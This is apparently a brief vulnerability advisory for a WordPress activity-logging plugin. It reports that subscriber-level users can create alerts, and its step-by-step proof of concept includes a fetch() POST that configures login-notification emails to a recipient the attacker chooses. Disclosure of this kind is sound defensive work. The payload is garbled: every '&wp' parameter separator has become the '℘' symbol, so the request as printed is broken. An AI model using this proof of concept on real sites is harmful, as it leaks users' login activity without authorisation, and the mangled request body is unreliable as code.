The plugin does not prevent users with little privileges on the site (like subscribers) from using its alert creation functionality, which may enable them to leak sensitive information.
Step 1: Log in as a subscriber Step 2: Get a nonce from https://example.com/wp-admin/admin-ajax.php?action=get_new_alert_triggers_notifications Step 3: Configure the alerts via: fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” },“method”:“POST”, “body”: “action=save_new_alert℘_stream_alerts_nonce=XXXX℘_stream_trigger_author=℘_stream_trigger_context=users-sessions℘_stream_trigger_action=login℘_stream_alert_type=email℘_stream_alert_status=wp_stream_enabled℘_stream_email_recipient=recipient%40example.com℘_stream_email_subject=test”, });